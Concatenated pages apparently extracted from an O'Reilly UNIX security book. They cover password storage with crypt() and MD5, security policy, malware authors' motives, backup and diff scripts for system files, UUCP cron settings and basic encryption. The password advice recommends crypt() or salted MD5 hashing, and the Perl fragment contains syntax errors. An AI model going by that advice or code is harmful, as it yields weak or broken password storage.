local($s2) = rand(64);<br />

$salt = substr($salts,$s1,1) . substr($salts,$s2,1);<br />

$encrypted_password= crypt($password,&salt)<br />

You can then check to see if a newly provided password is in fact the encrypted password with this simple Perl<br />

fragment:<br />

if($encrypted_password eq<br />

crypt($new_password, $encrypted_password){<br />

print "password matched.\n";}<br />

If you need access to crypt() from a shell script, consider using /usr/lib/makekey, which provides much the same<br />

functionality.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_05.htm (1 of 2) [2002-04-12 10:44:59]


[Chapter 23] 23.5 Tips on Using Passwords<br />

23.5.1 Use Message Digests for Storing Passwords<br />

Instead of using the crypt() function to store an encrypted password, consider using a cryptographic hash function such as<br />

MD5. Using a cryptographic hash allows the user to type a password (or, properly, a passphrase) of any length.<br />

This technique is the one that PGP uses for encrypting files with "conventional cryptography," as well as for encrypting the<br />

secret key that is stored on your hard disk. When you type in a passphrase, this phrase is processed with the MD5 message<br />

digest algorithm (described in Chapter 6). The resulting 128-bit hash is used as the key for the IDEA encryption algorithm.<br />

If you need to be able to verify a password, but you do not need an encryption key, you can store the MD5 hash. When you<br />

need to verify the user's password, take the new value entered by the user, compute the value's MD5, and see if the new<br />

MD5 matches the stored value.<br />

As with the crypt() function, you can include a random salt with the passphrase. If you do so, you must record the salt with<br />

the saved MD5 and use it whenever you wish to verify the user's password.<br />

The primary benefit to using a cryptographic hash value is that it takes whatever input the user types as the password, no<br />

matter how long that output might be. [13] This may encourage users to type longer passwords or passphrases that will be<br />

resistant to dictionary attacks. You might also remind them of this practice when you prompt them for new passwords.<br />

[13] But remember to check for buffer overflow when reading the password.<br />

23.4 Tips on Writing<br />

SUID/SGID Programs<br />

23.6 Tips on Generating<br />

Random Numbers<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_05.htm (2 of 2) [2002-04-12 10:44:59]


[Chapter 2] 2.4 Policy<br />

2.4 Policy<br />

Chapter 2<br />

Policies and Guidelines<br />

Policy helps to define what you consider to be valuable, and it specifies what steps should be taken to<br />

safeguard those assets.<br />

Policy can be formulated in a number of different ways. You could write a very simple, general policy of<br />

a few pages that covers most possibilities. You could also craft a policy for different sets of assets: a<br />

policy for email, a policy for personnel data, and a policy on accounting information. A third approach,<br />

taken by many large corporations, is to have a small, simple policy augmented with standards and<br />

guidelines for appropriate behavior. We'll briefly outline this latter approach, with the reader's<br />

understanding that simpler policies can be crafted; more information is given in the references.<br />

2.4.1 The Role of Policy<br />

Policy plays three major roles. First, it makes clear what is being protected and why. <strong>Sec</strong>ond, it clearly<br />

states the responsibility for that protection. Third, it provides a ground on which to interpret and resolve<br />

any later conflicts that might arise. What the policy should not do is list specific threats, machines, or<br />

individuals by name - the policy should be general and change little over time. For example:<br />

Information and information processing facilities are a critical resource for the Big<br />

Whammix Corporation. Information should be protected commensurate with its value to Big<br />

Whammix, and consistent with applicable law. All employees share in the responsibility for<br />

the protection and supervision of information that is produced, manipulated, received, or<br />

transmitted in their departments. All employees likewise share in the responsibility for the<br />

maintenance, proper operation, and protection of all information processing resources of Big<br />

Whammix.<br />

Information to be protected is any information discovered, learned, derived, or handled<br />

during the course of business that is not generally known outside of Big Whammix. This<br />

includes trade secret information (ours, and that of other organizations and companies),<br />

patent disclosure information, personnel data, financial information, information about any<br />

business opportunities, and anything else that conveys an advantage to Big Whammix so<br />

long as it is not disclosed. Personal information about employees, customers, and vendors is<br />

also to be considered confidential and protectable.<br />

All information at Big Whammix, however stored - on computer media, on printouts, in<br />

microfilm, on CD-ROM, on audio or video tape, on photographic media, or in any other<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_04.htm (1 of 6) [2002-04-12 10:45:00]


[Chapter 2] 2.4 Policy<br />

stored, tangible form - is the responsibility of the Chief Information Honcho (CIH). Thus,<br />

Big Whammix facilities should be used only for functions related to the business of Big<br />

Whammix, as determined by the President. The CIH shall be responsible for the protection<br />

of all information and information processing capabilities belonging to Big Whammix,<br />

whether located on company property or not. He will have authority to act commensurate<br />

with this responsibility, with the approval of the President of Big Whammix. The CIH shall<br />

formulate appropriate standards and guidelines, according to good business practice, to<br />

ensure the protection and continued operation of information processing.<br />

Key to note in this example policy is the definition of what is to be protected, who is responsible for<br />

protecting it, and who is charged with creating additional guidelines. This policy can be shown to all<br />

employees, and to outsiders to explain company policy. It should remain current no matter what<br />

operating system is in use, or who the CIH may happen to be.<br />

2.4.2 Standards<br />

Standards are intended to codify successful practice of security in an organization. They are generally<br />

phrased in terms of "shall." Standards are generally platform independent, and at least imply a metric to<br />

determine if they have been met. Standards are developed in support of policy, and change slowly over<br />

time. Standards might cover such issues as how to screen new hires, how long to keep backups, and how<br />

to test UPS systems.<br />

For example, consider a standard for backups. It might state:<br />

Backups shall be made of all online data and software on a regular basis. In no case will<br />

backups be done any less often than once every 72 hours of normal business operation. All<br />

backups should be kept for a period of at least six months; the first backup in January and<br />

July of each year will be kept indefinitely at an off-site, secured storage location. At least<br />

one full backup of the entire system shall be taken every other week. All backup media will<br />

meet accepted industry standards for its type, to be readable after a minimum of five years in<br />

unattended storage.<br />

This standard does not name a particular backup mechanism or software package. It clearly states,<br />

however, what is to be stored, how long it is to be stored, and how often it is to be made.<br />

Consider a possible standard for authentication:<br />

Every user account on each multiuser machine shall have only one person authorized to use<br />

it. That user will be required to authenticate his or her identity to the system using some<br />

positive proof of identity. This proof of identity can be through the use of an approved<br />

authentication token or smart card, an approved one-time password mechanism, or an<br />

approved biometric unit. Reusable passwords will not be used for primary authentication on<br />

any machine that is ever connected to a network or modem, that is portable and carried off<br />

company property, or that is used outside of a private office.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_04.htm (2 of 6) [2002-04-12 10:45:00]


[Chapter 2] 2.4 Policy<br />

2.4.3 Guidelines<br />

Guidelines are the "should" statements in policies. The intent of guidelines is to interpret standards for a<br />

particular environment - whether that is a software environment, or a physical environment. Unlike<br />

standards, guidelines may be violated, if necessary. As the name suggests, guidelines are not usually used<br />

as standards of performance, but as ways to help guide behavior.<br />

Here is a typical guideline for backups:<br />

Backups on <strong>UNIX</strong>-based machines should be done with the "dump" program. Backups<br />

should be done nightly, in single-user mode, for systems that are not in 24-hour production<br />

use. Backups for systems in 24-hour production mode should be made at the shift change<br />

closest to midnight, when the system is less loaded. All backups will be read and verified<br />

immediately after being written.<br />

Level 0 dumps will be done for the first backup in January and July. Level 3 backups should<br />

be done on the 1st and 15th of every month. Level 5 backups should be done every Monday<br />

and Thursday night, unless a level 0 or level 3 backup is done on that day. Level 7 backups<br />

should be done every other night except on holidays.<br />

Once per week, the administrator will pick a file at random from some backup made that<br />

week. The operator will be required to recover that file as a test of the backup procedures.<br />

Guidelines tend to be very specific to particular architectures and even to specific machines. Guidelines<br />

also tend to change more often than do standards, to reflect changing conditions.<br />

2.4.4 Some Key Ideas in Developing a Workable Policy<br />

The role of policy (and associated standards and guidelines) is to help protect those items you<br />

(collectively) view as important. They do not need to be overly specific and complicated in most<br />

instances. Sometimes, a simple policy statement is sufficient for your environment, as in the following<br />

example.<br />

The use and protection of this system is everyone's responsibility. Only do things you would<br />

want everyone else to do, too. Respect the privacy of other users. If you find a problem, fix<br />

it yourself or report it right away. Abide by all applicable laws concerning use of the system.<br />

Be responsible for what you do and always identify yourself. Have fun!<br />

Other times, a more formal policy, reviewed by a law firm and various security consultants, is the way<br />

you need to go to protect your assets. Each organization will be different. We know of some<br />

organizations that have volumes of policies, standards, and guidelines for their <strong>UNIX</strong> systems.<br />

There are some key ideas to your policy formation, though, that need to be mentioned more explicitly.<br />

These are in addition to the two we mentioned at the beginning of this chapter.<br />

2.4.4.1 Assign an owner<br />

Every piece of information and equipment to be protected should have an assigned "owner." The owner<br />

is the person who is responsible for the information, including its copying, destruction, backups, and<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_04.htm (3 of 6) [2002-04-12 10:45:00]


[Chapter 2] 2.4 Policy<br />

other aspects of protection. This is also the person who has some authority with respect to granting<br />

access to the information.<br />

The problem with security in many environments is that there is important information that has no clear<br />

owner. As a result, users are never sure who makes decisions about the storage of the information, or<br />

who regulates access to the information. Information sometimes even disappears without anyone noticing<br />

for a long period of time because there is no "owner" to contact or monitor the situation.<br />

2.4.4.2 Be positive<br />

People respond better to positive statements than to negative ones. Instead of building long lists of "don't<br />

do this" statements, think how to phrase the same information positively. The abbreviated policy<br />

statement above could have been written as a set of "don'ts" as follows, but consider how much better it<br />

read originally:<br />

It's your responsibility not to allow misuse of the system. Don't do things you wouldn't want<br />

others to do, too. Don't violate the privacy of others. If you find a problem, don't keep it a<br />

secret if you can't fix it yourself. Don't violate any laws concerning use of the system. Don't<br />

try to shift responsibility for what you do to someone else and don't hide your identity. Don't<br />

have a bad time!<br />

2.4.4.3 Remember that employees are people too<br />

When writing policies, keep users in mind. They will make mistakes, and they will misunderstand. The<br />

policy should not suggest that users will be thrown to the wolves if an error occurs.<br />

Furthermore, consider that information systems may contain information about users that they would like<br />

to keep somewhat private. This may include some email, personnel records, and job evaluations. This<br />

material should be protected, too, although you may not be able to guarantee absolute privacy. Be<br />

considerate of users' needs and feelings.<br />

2.4.4.4 Concentrate on education<br />

You would be wise to include standards for training and retraining of all users. Every user should have<br />

basic security awareness education, with some form of periodic refresher material (even if the refresher<br />

only involves being given a copy of this book!). Trained and educated users are less likely to fall for<br />

scams and social engineering attacks. They are also more likely to be happy about security measures if<br />

they understand why they are in place.<br />

A crucial part of any security system is giving staff time and support for additional training and<br />

education. There are always new tools and new threats, new techniques, and new information to be<br />

learned. If staff members are spending 60 hours each week chasing down phantom PC viruses and doing<br />

backups, they will not be as effective as staff given a few weeks of training time each year. Furthermore,<br />

they are more likely to be happy with their work if they are given a chance to grow and learn on the job,<br />

and are allowed to spend evenings and weekends with their families instead of trying to catch up on<br />

installing software and making backups.<br />

2.4.4.5 Have authority commensurate with responsibility<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_04.htm (4 of 6) [2002-04-12 10:45:00]


[Chapter 2] 2.4 Policy<br />

Spaf's first principle of security administration:<br />

If you have responsibility for security, but have no authority to set rules or punish violators, your<br />

own role in the organization is to take the blame when something big goes wrong.<br />

Consider the case we heard about in which a system administrator caught one of the programmers trying<br />

to break into the root account of the payroll system. Further investigation revealed that the account of the<br />

user was filled with password files taken from machines around the net, many with cracked passwords.<br />

The administrator immediately shut down the account and made an appointment with the programmer's<br />

supervisor.<br />

The supervisor was not supportive. She phoned the vice-president of the company and demanded that the<br />

programmer get his account back - she needed his help to meet her group deadline. The system<br />

administrator was admonished for shutting down the account and told not to do it again.<br />

Three months later, the administrator was fired when someone broke into the payroll system he was<br />

charged with protecting. The programmer allegedly received a promotion and raise, despite an apparent<br />

ready excess of cash.<br />

If you find yourself in a similar situation, polish up your resumé and start hunting for a new job before<br />

you're forced into a job search by circumstances you can't control.<br />

2.4.4.6 Pick a basic philosophy<br />

Decide if you are going to build around the model of "Everything that is not specifically denied is<br />

permitted" or "Everything that is not specifically permitted is denied." Then be consistent in how you<br />

define everything else.<br />

2.4.4.7 Defend in depth<br />

When you plan your defenses and policy, don't stop at one layer. Institute multiple, redundant,<br />

independent levels of protection. Then include auditing and monitoring to ensure that those protections<br />

are working. The chance of an attacker evading one set of defenses is far greater than the chance of his<br />

evading three layers plus an alarm system.<br />

Four Easy Steps to a More <strong>Sec</strong>ure Computer<br />

Running a secure computer is a lot of work. If you don't have time for the full risk-assessment and<br />

cost-benefit analysis described in this chapter, we recommend that you at least follow these four easy<br />

steps:<br />

1.<br />

2.<br />

Decide how important security is for your site. If you think security is very important and that your<br />

organization will suffer significant loss in the case of a security breach, the response must be given<br />

sufficient priority. Assigning an overworked programmer who has no formal security training to<br />

handle security on a half-time basis is a sure invitation to problems.<br />

Involve and educate your user community. Do the users at your site understand the dangers and<br />

risks involved with poor security practices (and what those practices are)? Your users should know<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_04.htm (5 of 6) [2002-04-12 10:45:00]


[Chapter 2] 2.4 Policy<br />

3.<br />

4.<br />

what to do and who to call if they observe something suspicious or inappropriate. Educating your<br />

user population helps make them a part of your security system. Keeping users ignorant of system<br />

limitations and operation will not increase the system security - there are always other sources of<br />

information for determined attackers.<br />

Devise a plan for making and storing backups of your system data. You should have off-site<br />

backups so that even in the event of major disaster, you can reconstruct your systems. We discuss<br />

this more in Chapter 7, Backups, and Chapter 12, Physical <strong>Sec</strong>urity.<br />

Stay inquisitive and suspicious. If something happens that appears unusual, suspect an intruder and<br />

investigate. You'll usually find that the problem is only a bug or a mistake in the way a system<br />

resource is being used. But occasionally, you may discover something more serious. For this<br />

reason, each time something happens that you can't definitively explain, you should suspect a<br />

security problem and investigate accordingly.<br />

2.3 Cost-Benefit Analysis 2.5 The Problem with<br />

<strong>Sec</strong>urity Through Obscurity<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch02_04.htm (6 of 6) [2002-04-12 10:45:00]


[Chapter 11] 11.3 Authors<br />

11.3 Authors<br />

Chapter 11<br />

Protecting Against Programmed<br />

Threats<br />

Not much is known about the people who write and install programmed threats, largely because so few<br />

have been identified. Based on those authors who are known to authorities, they can probably be grouped<br />

into a few major categories.<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Employees. One of the largest categories of individuals who cause security problems includes<br />

disgruntled employees or ex-employees who feel that they have been treated poorly or who bear<br />

some grudge against their employer. These individuals know the potential weaknesses in an<br />

organization's computer security. Sometimes they may install logic bombs or back doors in the<br />

software in case of future difficulty. They may trigger the code themselves, or have it be triggered<br />

by a bug or another employee.<br />

Thieves. A second category includes thieves and embezzlers. These individuals may attempt to<br />

disrupt the system to take advantage of the situation, or to mask evidence of their criminal activity.<br />

Spies. Industrial or political espionage or sabotage is another reason people might write malicious<br />

software. Programmed threats are a powerful and potentially untraceable means of obtaining<br />

classified or proprietary information, or of delaying the competition (sabotage), although not very<br />

common in practice.<br />

Extortionists. Extortion may also be a motive, with the authors threatening to unleash destructive<br />

software unless paid a ransom. Many companies have been victims of a form of extortion in which<br />

they have agreed not to prosecute (and then sometimes go on to hire) individuals who have broken<br />

into or damaged their systems. In return, the criminals agree to disclose the security flaws that<br />

allowed them to crack the system. An implied threat is that of negative publicity about the security<br />

of the company if the perpetrator is brought to trial, and that of additional damage if the flaws are<br />

not revealed and corrected.<br />

Experimenters. Undoubtedly, some programmed threats are written by experimenters and the<br />

curious. Other damaging software may be the result of poor judgment and unanticipated bugs.[3]<br />

Of course, many accidents can be viewed as criminal, too, especially if they're conducted with<br />

reckless disregard for the potential consequences.<br />

[3] This is particularly true of rabbit/bacteria problems.<br />

Publicity hounds. Another motivation for writing a virus or worm might be to profit, gain fame,<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_03.htm (1 of 2) [2002-04-12 10:45:00]


[Chapter 11] 11.3 Authors<br />

●<br />

or simply derive some ego gratification from the pursuit. In this scenario, someone might write a<br />

virus and release it, and then either try to gain publicity as its discoverer, be the first to market<br />

software that deactivates it, or simply brag about it on a bulletin board. We do not know if this has<br />

happened yet, but the threat is real as more media coverage of computer crime occurs, and as the<br />

market for antiviral and security software grows.<br />

Political activists. One ongoing element in PC virus writing seems to be an underlying political<br />

motivation. These viruses make some form of politically oriented statement when run or detected,<br />

either as the primary purpose or as a form of smokescreen. This element raises the specter of<br />

virus-writing as a tool of political extremists seeking a forum, or worse, the disruption or<br />

destruction of established government, social, or business institutions. Obviously, targeting the<br />

larger machines and networks of these institutions would serve a larger political goal.<br />

No matter what their numbers or motives, authors of code that intentionally destroys other people's data<br />

are vandals. Their intent may not be criminal, but their acts certainly are. Portraying these people as<br />

heroes or simply as harmless "nerds" masks the dangers involved and may help protect authors who<br />

attack with more malicious intent.<br />

11.2 Damage 11.4 Entry<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch11_03.htm (2 of 2) [2002-04-12 10:45:00]


[Chapter 7] 7.3 Backing Up System Files<br />

Chapter 7<br />

Backups<br />

7.3 Backing Up System Files<br />

In addition to performing routine backups of your entire computer system, you may wish to make<br />

separate backup copies of system-critical files on a regular basis. These backups can serve several<br />

functions:<br />

●<br />

●<br />

●<br />

They can help you quickly recover if a vital configuration file is unexpectedly erased or modified.<br />

They can help you detect unauthorized modifications to critical files, as well as monitor legitimate<br />

modifications.<br />

They make installing a new version of your operating system dramatically easier (especially if you<br />

do not wish to use your vendor's "upgrade" facility) by isolating all site-dependent configuration<br />

files in a single place.<br />

Ideally, you should back up every file that contains vital system configuration or account information.<br />

Setting-up an automatic system for backing up your system files is not difficult. You might, for instance,<br />

simply have a shell script that copies the files /etc/passwd and /usr/etc/aliases into a specially designated<br />

"backup directory" on a regular basis. Or you might have a more sophisticated system, in which a<br />

particular workstation gathers together all of the configuration files for every computer on a network,<br />

archives them in a directory, and sends you email each day that describes any modifications. The choice<br />

is up to you and your needs.<br />

7.3.1 What Files to Back Up?<br />

If you are constructing a system for backing up system files on a regular basis, you should carefully<br />

consider which files you wish to archive and what you want to do with them.<br />

By comparing a copy of the password file with /etc/passwd, for example, you can quickly discover if a<br />

new user has been added to the system. But it is also important to check other files. For example, if an<br />

intruder can modify the /etc/rc file, the commands he inserts will be executed automatically the next time<br />

the system is booted. Modifying /usr/lib/crontab can have similar results. (Chapter 11, Protecting<br />

Against Programmed Threats, describes what you should look for in these files.)<br />

Some files that you may wish to copy are listed in Table 7.1.<br />

Table 7.1: Critical System Files That You Should Frequently Back Up<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_03.htm (1 of 3) [2002-04-12 10:45:00]


[Chapter 7] 7.3 Backing Up System Files<br />

Filename Things to Look for<br />

/etc/passwd New accounts<br />

/etc/shadow Accounts with no passwords<br />

/etc/group New groups<br />

/etc/rc* Changes in the system boot sequence<br />

/etc/ttys, /etc/ttytab, or /etc/inittab Configuration changes in terminals<br />

/usr/lib/crontab, /usr/spool/cron/crontabs/, or /etc/crontab New commands set to run on a regular basis<br />

/usr/lib/aliases Changes in mail delivery (especially email<br />

addresses that are redirected to programs.)<br />

/etc/exports (BSD) /etc/dfs/dfstab (SVR4) Changes in your NFS filesystem security<br />

/etc/netgroups Changes in network groups<br />

/etc/fstab (BSD) /etc/vfstab (SVR4) Changes in mounting options<br />

/etc/inetd.conf Changes in network daemons<br />

UUCP files (in /usr/lib/uucp or /etc/uucp)<br />

L.sys or USERFILE Changes in the UUCP system<br />

Systems or Permissions<br />

7.3.2 Building an Automatic Backup System<br />

For added convenience, keep the backups of all of the system-critical files in a single directory. Make<br />

certain the directory isn't readable by any user other than root, and make sure it has a nonobvious name -<br />

after all, you want the files to remain hidden in the event that an intruder breaks into your computer and<br />

becomes the superuser! If you have a local area network, you may wish to keep the copies of the critical<br />

files on a different computer. An even better approach is to store these files on a removable medium such<br />

as a floppy disk or a cartridge disk that can be mounted when necessary.<br />

You can use tar or cpio to store all of the files that you back up in a single snapshot. Alternatively, you<br />

can also use RCS (Revision Control System) or SCCS (Source Code Control System) to archive these<br />

files and keep a revision history.<br />

Never Underestimate the Value of Paper<br />

Keeping printed paper copies of your most important configuration files is a good idea. If something<br />

happens to the online versions, you can always refer to the paper ones. Paper records are especially<br />

important if your system has crashed in a severe and nontrivial fashion, because in these circumstances<br />

you may not be able to recover your electronic versions. Finally, paper printouts can prove invaluable in<br />

the event that your system has been penetrated by nefarious intruders, because they form a physical<br />

record. Even the most skilled intruders cannot use a captured account to alter a printout in a locked desk<br />

drawer or other safe location.<br />

A single shell script can automate the checking described above. This script compares copies of specified<br />

files with master copies and prints any differences. The sample script included below keeps two copies of<br />

several critical files and reports the differences. Modify it as appropriate for your own site.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_03.htm (2 of 3) [2002-04-12 10:45:00]


[Chapter 7] 7.3 Backing Up System Files<br />

#!/bin/sh<br />

MANAGER=/u/sysadm<br />

FILES="/etc/passwd /etc/group /usr/lib/aliases\<br />

/etc/rc* /etc/netgroup /etc/fstab /etc/exports\<br />

/usr/lib/crontab"<br />

cd $MANAGER/private<br />

for FILE in $FILES<br />

do<br />

/bin/echo $FILE<br />

BFILE=`basename $FILE`<br />

/usr/bin/diff $BFILE $FILE<br />

/bin/mv $BFILE $BFILE.bak<br />

/bin/cp $FILE $BFILE<br />

done<br />

You can use cron to automate running this daily shell script as follows[7]:<br />

[7] This example assumes that you have a version of cron that allows you to specify the user<br />

under which the cron script should be run.<br />

0 0 * * * root /bin/sh /u/sysadm/private/daily \<br />

| mail -s "daily output" sysadm<br />

NOTE: A significant disadvantage of using an automated script to check your system is that<br />

you run the risk that an intruder will discover it and circumvent it. Nonstandard entries<br />

in/usr/lib/crontab are prime candidates for further investigations by experienced system<br />

crackers.<br />

See Chapter 9, Integrity Management, for additional information about system checking.<br />

7.2 Sample Backup Strategies 7.4 Software for Backups<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch07_03.htm (3 of 3) [2002-04-12 10:45:00]


Chapter 15<br />

UUCP<br />

15.6 Additional <strong>Sec</strong>urity Concerns<br />

UUCP is often set up by <strong>UNIX</strong> vendors in ways that compromise security. In addition to the concerns<br />

mentioned in earlier sections, there are a number of other things to check on your UUCP system.<br />

15.6.1 Mail Forwarding for UUCP<br />

Be sure when electronic mail is sent to the uucp user that it is actually delivered to the people who are<br />

responsible for administering your system. That is, there should be a mail alias for uucp that redirects<br />

mail to another account. Do not use a .forward file to do this. If the file is owned by uucp, the file could<br />

be altered to subvert the UUCP system. Instead, use whatever other alias mechanism is supported by<br />

your mailer.<br />

15.6.2 Automatic Execution of Cleanup Scripts<br />

The UUCP system has a number of shell files that are run on a periodic basis to attempt to redeliver old<br />

mail and delete junk files that sometimes accumulate in the UUCP directories.<br />

On many systems, these shell files are run automatically by the crontab daemon as user root, rather than<br />

user uucp. On these systems, if an attacker can take over the uucp account and modify these shell scripts,<br />

then the attacker has effectively taken over control of the entire system; the next time crontab runs these<br />

cleanup files, it will be executing the attacker's shell scripts as root!<br />

You should be sure that crontab runs all uucp scripts as the user uucp, rather than as the user root.<br />

However, the scripts themselves should be owned by root, not uucp, so that they can't be modified by<br />

people using the uucp programs.<br />

If you are running an ancient version of cron that doesn't support separate files for each account, or that<br />

doesn't have an explicit user ID field in the crontab file, you should use a su command in the crontab file<br />

to set the UID of the cleanup process to that of the UUCP login. Change:<br />

0 2 * * * /usr/lib/uucp/daily<br />

to:<br />

[Chapter 15] 15.6 Additional <strong>Sec</strong>urity Concerns<br />

0 2 * * * su uucp -c /usr/lib/uucp/daily<br />

On somewhat newer crontab systems that still don't support a separate crontab file for each user, change<br />

this:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_06.htm (1 of 2) [2002-04-12 10:45:00]


to:<br />

[Chapter 15] 15.6 Additional <strong>Sec</strong>urity Concerns<br />

0 2 * * * root /usr/lib/uucp/daily<br />

0 2 * * * uucp /usr/lib/uucp/daily<br />

If you are using System V, the invocation of the daily shell script should be in the file<br />

/usr/spool/cron/crontabs/uucp, and it should not be in the file /usr/spool/cron/crontabs/root.<br />

15.5 <strong>Sec</strong>urity in BNU UUCP 15.7 Early <strong>Sec</strong>urity Problems<br />

with UUCP<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch15_06.htm (2 of 2) [2002-04-12 10:45:00]


[Chapter 6] 6.2 What Is Encryption?<br />

Chapter 6<br />

Cryptography<br />

6.2 What Is Encryption?<br />

Encryption is a process by which a message (called plaintext) is transformed into another message (called ciphertext) using a<br />

mathematical function[5] and a special encryption password, called the key.<br />

[5] Although it may not be expressed as such in every case.<br />

Decryption is the reverse process: the ciphertext is transformed back into the original plaintext using a mathematical function and a<br />

key.<br />

Figure 6.1: A simple example of encryption<br />

The process of encryption and decryption is shown in basic terms in Figure 6.1. Here is a simple piece of plaintext:<br />

Encryption can make <strong>UNIX</strong> more secure.<br />

This message can be encrypted with an encryption algorithm known as the Data Encryption Standard (DES), which we describe in a<br />

later section, and the key nosmis to produce the following encrypted message:[6]<br />

[6] Encrypted messages are inherently binary data. Because of the limitations of paper, control characters are printed<br />

preceded by a caret (^), while characters with their most significant bit set are preceded by a M-.<br />

M-itM-@g^B^?^B?^NM-XM-vZIM-U_h^X^$kM-^^sI^^M-f1M-^ZM-jM-gBM-6M->^@M-"=^M-^JM-7M--M-^T<br />

When this message is decrypted with the key nosmis, the original message is produced:<br />

Encryption can make <strong>UNIX</strong> more secure.<br />

If you tried to decrypt the encrypted message with a different key, such as gandalf, you might get the following:<br />

M-&u=:;M-X^G?M-MM-^MM-<br />

M-,M-kM-^?M-R8M-}}pM-?^M^^M-l^ZM-IM-^U0M-D^KM-eMhM-yM-^M-^]M-mM-UM-^ZM-@^^N<br />

Indeed, the only way to decrypt the encrypted message and get printable text is by knowing the secret key nosmis. If you don't know<br />

the key, and you don't have access to a supercomputer, you can't decrypt the text. If you use a strong encryption system, even the<br />

supercomputer won't help you.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_02.htm (1 of 3) [2002-04-12 10:45:01]


[Chapter 6] 6.2 What Is Encryption?<br />

6.2.1 What You Can Do with Encryption<br />

Encryption can play a very important role in your day-to-day computing and communicating:<br />

●<br />

●<br />

●<br />

●<br />

Encryption can protect information stored on your computer from unauthorized access - even from people who otherwise have<br />

access to your computer system.<br />

Encryption can protect information while it is in transit from one computer system to another.<br />

Encryption can be used to deter and detect accidental or intentional alterations in your data.<br />

Encryption can be used to verify whether or not the author of a document is really who you think it is.<br />

Despite these advantages, encryption has its limits:<br />

●<br />

●<br />

●<br />

●<br />

Encryption can't prevent an attacker from deleting your data altogether.<br />

An attacker can compromise the encryption program itself. The attacker might modify the program to use a key different from<br />

the one you provide, or might record all of the encryption keys in a special file for later retrieval.<br />

An attacker might find a previously unknown and relatively easy way to decode messages encrypted with the algorithm you<br />

are using.<br />

An attacker could access your file before it is encrypted or after it is decrypted.<br />

For all these reasons, encryption should be viewed as a part of your overall computer security strategy, but not as a substitute for<br />

other measures such as proper access controls.<br />

6.2.2 The Elements of Encryption<br />

There are many different ways that you can use a computer to encrypt or decrypt information. Nevertheless, each of these so-called<br />

encryption systems share common elements:<br />

Encryption algorithm<br />

The encryption algorithm is the function, usually with some mathematical foundations, which performs the task of encrypting<br />

and decrypting your data.<br />

Encryption keys<br />

Key length<br />

Encryption keys are used by the encryption algorithm to determine how data is encrypted or decrypted. Keys are similar to<br />

computer passwords: when a piece of information is encrypted, you need to specify the correct key to access it again. But<br />

unlike a password program, an encryption program doesn't compare the key you provide with the key you originally used to<br />

encrypt the file, and grant you access if the two keys match. Instead, an encryption program uses your key to transform the<br />

ciphertext back into the plaintext. If you provide the correct key, you get back your original message. If you try to decrypt a<br />

file with the wrong key, you get garbage.[7]<br />

[7] Of course, we are assuming that your original message wasn't garbage, too. Otherwise, everything you would<br />

decrypt would probably appear as garbage!<br />

As with passwords, encryption keys have a predetermined length. Longer keys are more difficult for an attacker to guess than<br />

shorter ones because there are more of them to try in a brute-force attack. Different encryption systems allow you to use keys<br />

of different lengths; some allow you to use variable-length keys.<br />

Plaintext<br />

The information which you wish to encrypt.<br />

Ciphertext<br />

The information after it is encrypted.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch06_02.htm (2 of 3) [2002-04-12 10:45:01]


[Chapter 6] 6.2 What Is Encryption?<br />

6.2.3 Cryptographic Strength<br />

Different forms of cryptography are not equal. Some systems are easily circumvented, or broken. Others are quite resistant to even<br />

the most determined attack. The ability of a cryptographic system to protect information from attack is called its strength. Strength<br />

depends on many factors, including:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

The secrecy of the key.<br />

The difficulty of guessing the key or trying out all possible keys (a key search). Longer keys are generally harder to guess or<br />

find.<br />

The difficulty of inverting the encryption algorithm without knowing the encryption key (breaking the encryption algorithm).<br />

The existence (or lack) of back doors, or additional ways by which an encrypted file can be decrypted more easily without<br />

knowing the key.<br />

The ability to decrypt an entire encrypted message if you know the way that a portion of it decrypts (called a known text<br />

attack).<br />

The properties of the plaintext and knowledge of those properties by an attacker. (For example, a cryptographic system may be<br />

vulnerable to attack if all messages encrypted with it begin or end with a known piece of plaintext. These kinds of regularities<br />

were used by the Allies to crack the German Enigma cipher during the <strong>Sec</strong>ond World War.)<br />

The goal in cryptographic design is to develop an algorithm that is so difficult to reverse without the key that it is at least roughly<br />

equivalent to the effort required to guess the key by trying possible solutions one at a time. We would like this property to hold even<br />

